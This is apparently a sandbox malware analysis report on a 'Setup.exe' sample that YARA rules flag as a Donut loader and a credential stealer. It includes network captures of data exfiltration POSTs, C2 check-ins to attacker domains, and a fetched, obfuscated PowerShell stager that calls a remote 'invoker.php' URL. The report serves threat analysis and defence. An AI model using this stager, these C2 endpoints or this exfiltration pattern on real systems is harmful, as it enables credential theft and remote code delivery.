                                                                                                      2025-01-01 15:56:36 UTC | 15331 bytes | OUT | Data Raw: 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 49 41 4c 53 4e 45 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii (CR/LF restored from the raw bytes): --IALSNE3Y\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n48F435348DABFB10F354CDD8344DEF36\r\n--IALSNE3Y\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n--IALSNE3Y\r\nContent-Disposition: form-data; name="lid"\r\n\r\nhRjzG3--TRON\r\n--IALSNE3Y\r\nContent-Dispositi
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: 7a 43 94 86 c2 77 e3 86 01 4f 72 4c ac ff cf 65 84 7d 15 40 13 97 73 b3 2d fe 32 60 fb 24 1f 9d c6 56 10 33 5d a0 7b 1a 0b c4 ae a8 c3 4a f9 84 e4 10 df 82 b3 ce 82 02 01 d2 c4 f5 1b e3 27 e2 04 68 f3 c5 ea 53 f1 77 c2 ed 36 22 02 8e 85 ed 65 18 fd 21 64 eb ec 7c 10 65 1c 84 d7 07 25 1d 41 fe 93 79 10 9c 0d 55 4a e1 8f 34 c3 85 fb 81 83 56 27 20 57 f3 bc 05 91 ea 1b 97 16 05 6e fc db f2 71 c0 a5 6f ac ef 5d da 88 fd 90 d3 3b 74 a8 66 fd c6 55 2a 54 60 5f d1 61 52 72 35 31 c4 75 32 2d 0a 05 f7 ee f7 11 31 c2 84 22 d3 4e 0c 4d cb c1 80 24 ff 78 6a 2e 28 0e 76 74 59 73 68 d0 c0 4f 07 2c 1d 7c df a7 07 b6 1b cb ef be 39 35 3a 78 71 77 bf f7 8d 93 bd d2 bd 93 63 8a f6 6f 1d 4a aa b2 df d8 54 14 fc 77 31 6d f6 f0 3f 40 ab 2a f4 83 b7 20 30 d2 10 1d df a6 8f df
                                                                                                      Data Ascii: zCwOrLe}@s-2`$V3]{J'hSw6"e!d|e%AyUJ4V' Wnqo];tfU*T`_aRr51u2-1"NM$xj.(vtYshO,|95:xqwcoJTw1m?@* 0
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: c1 f8 80 e1 5a aa 09 f7 fb c7 f1 b8 b2 d1 c9 e9 e9 e8 3a fd 09 25 67 15 b0 d3 31 02 22 c8 ed c3 53 2d 03 89 2a 4a 8a 11 71 bf de 9f 38 26 1f 69 e0 d4 65 88 f3 3b ae c2 e7 c7 cb 57 eb ea e0 1e 35 96 fd 7a 97 41 e0 bf ab 66 3d 2d f0 aa 84 87 47 f3 f3 88 c7 a2 f9 85 d6 94 fa 96 84 76 36 c9 69 bf da a8 7d 14 47 90 43 09 ed c1 99 3c d4 5d 12 af 54 79 25 98 da 72 27 b4 76 4f fe a4 5c 3f ff 77 f5 ac c9 2b a3 bf cf 46 5f 4d 0f d9 c7 77 37 48 b4 8f da 6c f8 bc 31 1a f6 17 ff a5 58 3b 15 c2 8f fe c9 ec 5e 77 ba e2 f7 28 d3 10 d1 99 25 9a 95 db 22 2b b4 3e 1c 7b 6c 08 ea 8e da 12 79 ba a3 40 25 9d a5 3c c1 4b 17 c9 90 78 c1 0e 16 4d 17 63 8e 6f ce 72 bb df 73 f4 5b 4d f0 1e fa bf 76 98 b6 76 d2 1f 94 40 fc 8b b2 8b d7 e7 6d 46 22 05 08 47 43 6d 28 57 f2 35 06 f4 f8
                                                                                                      Data Ascii: Z:%g1"S-*Jq8&ie;W5zAf=-Gv6i}GC<]Ty%r'vO\?w+F_Mw7Hl1X;^w(%"+>{ly@%<KxMcors[Mvv@mF"GCm(W5
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: 5c 72 39 b0 f1 a2 5f a0 27 b3 e2 f3 48 4d c5 cb 7f 58 4c 6e 7e ec e9 ea a9 95 3f 4e 4c 6a f3 39 a1 ae b1 9f 5b bf a9 be c6 ee 36 af 38 d7 3e ed cf a4 e6 ed 05 8e c2 45 00 73 eb 34 70 bc b0 83 67 a7 4e af 6c a1 30 cb 6d 58 82 55 7a a0 8d c3 51 c7 87 db 7c 5d 7f 74 2f c2 6a 42 6e b2 40 1a c8 c6 84 dc f2 9a 87 e8 76 a1 f6 06 1f d4 f1 33 bd 6f c8 6d 26 4f c3 2d b4 80 c3 c7 5f 1b 88 8f 30 05 1e f2 ff df 11 e8 48 e6 28 04 ca d0 50 93 01 b8 56 96 8b 88 2c 89 48 cd 52 14 b8 10 f2 54 9b 6f 8d 2e ae 8a 7d f5 4a 71 48 eb 07 20 ec 21 3a 62 9e 61 89 5f 26 5d 3d b8 81 c5 4f 0c a3 54 50 20 f1 23 27 c4 26 c2 26 31 d4 b0 c9 aa 34 88 36 3e db b8 e0 6a c0 ba 4b 77 bd 71 d3 b8 77 c6 70 ad 8f 18 13 39 98 23 40 3f 23 03 a3 09 3e 67 5d b8 35 0a 54 67 73 06 92 0a 68 15 dd ae 5a
                                                                                                      Data Ascii: \r9_'HMXLn~?NLj9[68>Es4pgNl0mXUzQ|]t/jBn@v3om&O-_0H(PV,HRTo.}JqH !:ba_&]=OTP #'&&146>jKwqwp9#@?#>g]5TgshZ
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: bb 00 a6 12 e6 84 bc 9a df 63 c6 32 12 4d ed 89 ff 46 22 d0 d4 50 b1 3d d2 d8 79 94 27 da bc 1d 65 ee a4 f1 eb 32 fe a5 df d6 7b 10 dd 71 2e 80 d5 87 20 b1 8c 00 a6 6f 3a dd 66 cd cc ee 3c b9 7a 82 73 cd 00 8f 9f d2 0d fe 2a 19 88 e5 c1 08 63 7a 15 c6 d1 8c a8 a2 6e a3 39 d9 0f d6 8c 26 63 6c b8 50 a3 bc 95 7b a6 53 d2 e8 c8 f8 9d 99 a1 8a f8 cd 97 02 14 7e ce 9d d1 60 6c 3d a9 f6 3a 93 19 f1 f7 20 b9 4e 22 d2 b8 0e c1 0e 84 49 94 a3 2e 11 69 7d 68 46 5c b9 7a 3a 7c 8f 6f e9 29 9f 8a 64 b2 a5 7d 46 02 4e 48 70 3f a3 64 cf 2e 1d 2e e9 bb ac e9 8d 67 12 91 87 f9 4c aa 7e ac 34 69 dd 5c cd 6c dd e2 0e 6b d2 c1 08 81 d7 03 6a e3 59 6f b8 c0 9f af 63 4f 22 6b 8c 74 b3 12 78 85 c0 ed 09 68 f1 9c 69 66 82 68 ec f3 85 73 09 ec 1f df d7 70 4d f9 ab 6a 64 b1 3f c7
                                                                                                      Data Ascii: c2MF"P=y'e2{q. o:f<zs*czn9&clP{S~`l=: N"I.i}hF\z:|o)d}FNHp?d..gL~4i\lkjYocO"ktxhifhspMjd?
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: be 7e 5b b2 4c af e8 68 8a e7 5c 11 16 ff f1 37 b7 c3 15 7b 07 0e f2 87 4e 60 42 fd 51 3f 16 70 b1 59 75 26 34 f3 b0 89 10 09 ce fc 93 c0 4a 2f 56 82 ca b5 71 b0 ec 9b 5e 51 98 bd 5b 06 36 c4 c0 2f b9 d8 f5 51 a2 83 6d af ce 12 ab eb bb 25 6c 2f bc f0 e2 e9 ff 0e d3 5c cf c0 de e1 92 16 a1 bf 42 ec 44 55 99 48 2a 6c 33 56 2b ca b2 5b 57 ab 7d 86 32 d4 fd 30 ef f5 c1 fd d9 67 2e a0 6f ae 31 ce ec cc 14 b9 0a dd a4 aa 6b 2e a3 67 d1 cb 39 33 36 47 c9 74 d6 92 2a 6d 0c 80 b7 68 c6 3c ab 8f 94 26 02 08 7b c4 a2 94 b8 d9 0d db 6b 83 ff ae 4b 8e d4 30 3b a7 7e 26 c8 1d 77 86 f7 81 06 95 9d fd 0e b3 2d 10 06 1c 92 62 c8 37 c0 d4 b0 4b 5c e0 81 38 43 0f 91 76 77 af ef 7b bf 35 7b b7 89 49 15 62 6f fc da aa a4 65 f9 c5 9b 2c 3d 71 65 f7 4c 0e fe ed 59 b8 8e 07 2c
                                                                                                      Data Ascii: ~[Lh\7{N`BQ?pYu&4J/Vq^Q[6/Qm%l/\BDUH*l3V+[W}20g.o1k.g936Gt*mh<&{kK0;~&w-b7K\8Cvw{5{Iboe,=qeLY,
                                                                                                      2025-01-01 15:56:36 UTC15331OUTData Raw: f1 d1 7a fe 71 2c de e5 4e e0 b7 23 8f 96 b6 32 bd 8c f7 89 6c 78 39 0a 28 54 f7 bc f4 c6 14 0d 5f c6 e1 11 df 7f a7 63 c7 8a 17 cc 49 fc 5f 37 db 11 75 40 da a9 ca e8 66 b6 79 aa ef 13 07 57 fe 49 dd 11 eb cc 83 28 12 84 09 a5 3d f6 c8 b1 f9 5a 08 cc 3e 0b 85 88 72 59 ca 90 a3 70 ef 49 8e d6 b9 34 ee bd 1e 74 4c 1f de e5 22 31 90 f7 7e a4 45 db a6 66 ad 68 96 87 5c c9 9a 66 e6 08 75 8a 86 bb 48 16 47 54 1f 01 16 a3 99 1a a8 ef d8 de bf b4 e1 8a 86 ab 38 48 ad 01 1b 7b 35 b2 1c b2 76 b4 97 00 3c 35 4e 10 71 28 04 cf 2a 76 ce ce 12 99 64 1d 1e fc 7e 85 52 b9 eb b6 12 73 64 82 65 29 96 85 0d fb f9 ab d5 ff 77 81 2f f3 30 b3 a4 f8 98 f0 c2 e5 98 4c 1d 8c f1 79 b2 2f ef ac 4c 9c a1 38 96 23 0d bd 1e 89 9b 2d 8e 11 57 1d 08 33 4e 52 f5 e4 20 da 44 8e b2 d0 a6
                                                                                                      Data Ascii: zq,N#2lx9(T_cI_7u@fyWI(=Z>rYpI4tL"1~Efh\fuHGT8H{5v<5Nq(*vd~Rsde)w/0Ly/L8#-W3NR D
2025-01-01 15:56:38 UTC | 1139 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 15:56:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=34mtaov7k8912rlo6snp44ccn8; expires=Sun, 27 Apr 2025 09:43:16 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2qqbv1%2BJ8PsNnkK3tcF35Eqn9LeJKlCRUI83VMTewiUtaq%2FvkfC2Mqh52p9HTBzvfpu%2FCcfbgH2y%2BXlVcl%2Bxqd9oAl7cOs7AE%2F7cb0CPpvJFVGD9dBHcXqjClGqVAmcKnQxst4jJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb3b3483d0e425b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2140&min_rtt=2137&rtt_var=809&sent=192&recv=568&lost=0&retrans=0&sent_bytes=2847&recv_bytes=552088&delivery_rate=1347485&cwnd=238&unsent_bytes=0&cid=72674d915cea4e08&ts=1671&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | 6984 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:56:38 UTC | 268 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 113
Host: locketsashayz.click
2025-01-01 15:56:38 UTC | 113 | OUT | Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=48F435348DABFB10F354CDD8344DEF36
2025-01-01 15:56:39 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Wed, 01 Jan 2025 15:56:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=dtrp9u78825i9hbd3ba4oo9gkd; expires=Sun, 27 Apr 2025 09:43:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0yHUeqSb3MZi1WexsdgkqISknMkh2EK5v8TeI5jzUfC3WnSjOHOii7EPVlep3bLkDNxhoPbFU3%2BPJ8COsPoSW2kIFsIehIdUMFkGZLCNftlkQJfoAaUoi0%2B3VuUImHOr9AcWjhL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fb3b355fd6e7d20-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2156&min_rtt=2017&rtt_var=1036&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1017&delivery_rate=931122&cwnd=207&unsent_bytes=0&cid=66304b817bd9f80d&ts=477&x=0"
2025-01-01 15:56:39 UTC | 218 | IN | Data Ascii: d4YUonTPZd204C2BhQayY50HxR7arB/xWrkIUSCrJGYaI6MQU51Gf5JnasaCNRehaMUzKIzbTRZsP/9U4linNWllN8FXjCa4dhcrA2JBNSG/xeN5mI+805ifWnKDvPahqAFGgdbp4prz5x4kR/NwlSvBUhm9+slmbe+athYt02PY0IJFMTlTGrEXGweX4fXk3yUHOL3uPFJYey4DAwgjs8
2025-01-01 15:56:39 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | 6984 | C:\Users\user\Desktop\Setup.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 15:56:39 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: cegu.shop
2025-01-01 15:56:40 UTC | 249 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Wed, 01 Jan 2025 15:56:40 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 329
Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
Connection: close
ETag: "676c9e2a-149"
Accept-Ranges: bytes
2025-01-01 15:56:40 UTC | 329 | IN | Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.



Target ID: 0
Start time: 10:56:06
Start date: 01/01/2025
Path: C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Setup.exe"
Imagebase: 0x450000
File size: 74'880'677 bytes
MD5 hash: ABDA8CEA9C2D8BC35847D4D189F61F2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4139966079.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Memory Dump Source
• Source File: 00000000.00000003.1923253582.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, Offset: 014A5000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_14a5000_Setup.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
• Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
• Opcode Fuzzy Hash: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
• Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92